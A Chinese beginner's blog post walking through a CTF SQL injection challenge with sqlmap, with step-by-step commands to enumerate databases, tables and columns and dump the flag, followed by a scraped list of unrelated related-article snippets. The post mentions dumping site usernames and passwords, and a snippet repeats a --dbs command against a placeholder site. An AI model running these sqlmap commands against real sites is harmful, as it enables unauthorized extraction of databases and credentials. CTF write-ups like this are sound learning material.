第一次完成了一个注入呢,虽然是恬不知耻的用sqlmap跑出来的

简单介绍注入时后台的数据等级,有助于后面的理解

  ①可以类比成一个装着excel文件的文件夹,每一个excel文件就相当于一个数据库

  

  ②库的下一级是表,相当于一个文件中存在的sheet表

  

  ③表的下级是列

  

  ④每一列中又有字段,可以相当于excel中的一个格格啦

简单记一下步骤,大佬们不要嘲笑我这个菜鸡啦

  1、获得注入点,一般在URL末尾存在参数

  2、爆出所有数据库名称

  3、选定数据库,列出其中的表

  4、列出选定表中的列

  5、列出选定列中的所有字段

  6、爆出相应字段

下面以Geek2017的“Cloud的错误”实践一下(大佬们我错了,忘了不能先开wp的规则,这次先隐藏,求轻踩)

网页的源码中有提示"sycid=1",很明显这就是注入点的参数格式啦,丢sqlmap咯

1、检测注入点可用

sqlmap -u http://game.sycsec.com:2007/?sycid=1

  -u :指定注入url

2、暴库

sqlmap -u http://game.sycsec.com:2007/?sycid=1 --dbs

  --dbs :曝出该sqlserver中所有数据库名称

  结果:好像看到了很有趣的“f1ag”库

  

3、列出数据库中的表

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag --tables

  -D:指定数据库名称(datebase)

  --tables:列出表

  可以看到“f1ag”下只有一个“flag”表

      

4、列出表中的列

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag --columns

  -T:指定表名(table)

  --columns:打印列名

  结果:这里列出了表中的两个列,

  这里有个问题,在图形展示的列的名字是不完整的,而应该去上面箭头位置寻找完整的列名

  

5、爆出此列中的字段

sqlmap -u http://game.sycsec.com:2007/?sycid=1 -D f1ag -T flag -C f4ag --dump

  -C :指定要暴的列

  --dump:把字段展示出来

  结果:就看到我们最喜欢的flag啦!

  

除了这些,还可以爆网站的用户名密码,以后有机会试试咯

参考网站:http://blog.csdn.net/zgyulongfei/article/details/41017493

作者:辣鸡小谱尼


出处:http://www.cnblogs.com/ZHijack/

如有转载,荣幸之至!请随手标明出处;

SQLMap简单尝试的更多相关文章

  1. 简单尝试Spring Cloud Gateway

    简单尝试Spring Cloud Gateway 简介 Spring Cloud Gateway是一个API网关,它是用于代替Zuul而出现的.Spring Cloud Gateway构建于Sprin ...

  2. python+selenium 简单尝试

    前言 selenium是一种自动化测试工具,简单来说浏览器会根据写好的测试脚本自动做一些操作. 关于自动化测试,一开始接触的是splinter,但是安装的时候发现它是基于selenium的,于是打算直 ...

  3. react-native学习笔记——简单尝试

    毫无疑问,我是个不善于写博文的人. 毫无疑问,react是个出的框架. 毫无疑问,react-native更是个牛逼的引擎. 我个人对react-native的理解就是js被js引擎编译,去调用本地语 ...

  4. 关于MS12-020一次简单尝试

    由于之前着重于web漏洞,主机漏洞这块比较薄弱.也没有用过metasploit,对于很多系统漏洞还不熟悉,正好这几天不忙,就想着慢慢学习,再写点简单的东西,进行总结记录. 这次尝试的是MS12-020 ...

  5. sqlmap简单使用

    就以实验吧上那个简单的sql注入题为例吧,不过那道题确实经典,把sqlmap的整个使用过程都展现了一遍,先奉上那道题的地址:http://ctf5.shiyanbar.com/web/index_3. ...

  6. sqlmap简单中文说明

    首先下载需要的文件,如果是windows环境直接到http://sqlmap.org/下载安装所需要的文件即可. 更新 svn checkout https://svn.sqlmap.org/sqlm ...

  7. sqlmap简单流程使用

    -u “(url)” 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可 ...

  8. 简单尝试利用vultr vps自架PPTP上网用于工作学习需要

    因为学习和工作的需要用到登陆海外网站查阅相关的资料和文档,之前有需要使用的时候是问网友索要的账户登录本地电脑拨号的,但是老是跟别人要还是不好,决定自己尝试搭建一个长期使用.看到有不少的介绍提到VULT ...

  9. mysql sqlmap 注入尝试

    假设注入点为 http://www.abc.com/news.php?id=12 //探测数据库信息 sqlmap -u http://www.abc.com/news.php?id=12 –dbs ...

随机推荐

  1. Linux学习(四)单用户模式、救援模式、虚拟机克隆、linux互连(包括密匙登录)

    一.单用户模式 忘记root密码后,找回密码有两种方法: 单用户(grub没有加密的情况下可以使用) 救援模式 这一节我们先讲单用户模式   1.先重启(3种方法) reboot init 6 sho ...

  2. Linux必知必会的目录与启动过程

    第1章 /etc/目录 1.1 /etc/sysconfig/network-scripts/ifcfg-eth0 linux第一块网卡的配置文件 [root@znix ~]# cat /etc/sy ...

  3. YARN到底是怎么一回事?

    文章思路: 首先提出第一代MRv1(MapReduce Version1.0)的局限性,然后解释YARN是怎么克服这些局限性的,接着说了YARN的编程模型,说了YARN的组成,YARN的通信协议和YA ...

  4. Windows下caffe的配置和调用caffe库(二)

    二. Caffe库的调用: 新建空白项目,将配置管理器更改为x64运行方式.(release和Debug均可). Debug配置: 1)      包含目录: D:\caffe-master\incl ...

  5. MYSQL触发器在PHP项目中用来做信息备份、恢复和清空

    案例:通过PHP后台代码可以将员工的信息删除,将删除的员工信息进行恢复(类似于从回收站中恢复员工信息),并且还可以将已经删除的员工进行清空(类似于清空回复站的功能). 思路:要有一张员工表,还要有一张 ...

  6. Linux系列教程(二十一)——Linux的bash基本功能

    上篇博客我们介绍了什么是shell,以及编写shell脚本的两种执行方式.我们知道在敲命令的时候,有很多快捷键,比如tab键能补全命令,在比如为什么我们直接敲 ll 命令能显示目录的长格式,其实这是b ...

  7. 漫淡面向对象——POJO对象

    产品或者服务由数据存储和数据计算组成.pojo对象就是用于数据存储.一旦确定后,整个应用或者产品的数据来源就确定.比如一个页面或者功能需要使用什么数据就可以快速找到对应的对象或者通过对象的关系找出来. ...

  8. 使用flex

    Flex如何处理二义性模式: 1.词法分析器匹配输入时匹配尽可能多的字符串 2.如果两个模式都可以匹配的话,匹配在程序中更早出现的模式 上下文相关的记号 flex提供起始状态(start state) ...

  9. bootstrap的模态简单案例

    使用时需添加bootstrap的引用,否则实现不出来效果 <!DOCTYPE html> <html><head>    <meta name="v ...

  10. python常用数据结构

    0. 字典初始化 d = {'a':1,'b':2} 或 d={} d['a'] = 1 d['b'] = 2 是不是和json格式数据很相似,语法和JavaScript又很相似 1. 变量接受序列分 ...